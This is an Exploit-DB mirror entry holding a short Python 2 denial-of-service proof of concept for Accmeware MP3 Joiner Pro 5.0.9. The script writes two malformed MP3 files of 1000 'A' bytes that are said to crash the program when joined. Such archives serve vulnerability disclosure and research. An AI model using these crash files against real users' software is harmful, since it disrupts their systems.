exploit-db-mirror/exploits/windows/dos/15786.py
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

26 lines
No EOL
591 B
Python
Executable file

# Exploit Title: Accmeware MP3 Joiner Pro 5.0.9 DoS PoC
# Date: 12/20/2010
# Author: 0v3r
# Software Link: http://www.mp3-joiner.net/Files/MJPSetup.exe
# Version: 5.0.9
# Tested on: Windows XP SP3 EN (VirtualBxox)
# CVE: N/A
# The application crashes when trys to join two malformed mp3 files
#!/usr/bin/python
buff = "\x41" * 1000
try:
f = open("1.mp3",'w')
f.write(buff)
f.close()
f = open("2.mp3",'w')
f.write(buff)
f.close()
print "Vulnerable files created!..."
print "Insert mp3 files into the application and select join\n"
except:
print "Error occured!"